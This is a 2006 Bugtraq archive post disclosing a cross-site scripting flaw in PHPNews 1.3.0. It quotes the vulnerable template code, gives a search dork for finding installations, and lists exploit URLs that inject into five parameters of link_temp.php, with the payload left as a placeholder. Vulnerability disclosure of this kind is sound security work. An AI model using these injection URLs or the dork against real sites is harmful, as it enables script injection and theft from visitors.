Bugtraq mailing list archives
PHPNews 1.3.0 XSS
From: emulamex () hotmail com
Date: 1 Dec 2006 20:57:10 -0000
PHP Script: PHPNews 1.3.0 Class: XSS Website: http://newsphp.sourceforge.net Found by: Detefix dork: inurl:phpnews ----- - Vulnerable Code: <?php print<<<EOT <a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by $username on $time<br /> ----- - Exploits: http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]
Current thread:
- PHPNews 1.3.0 XSS emulamex (Dec 02)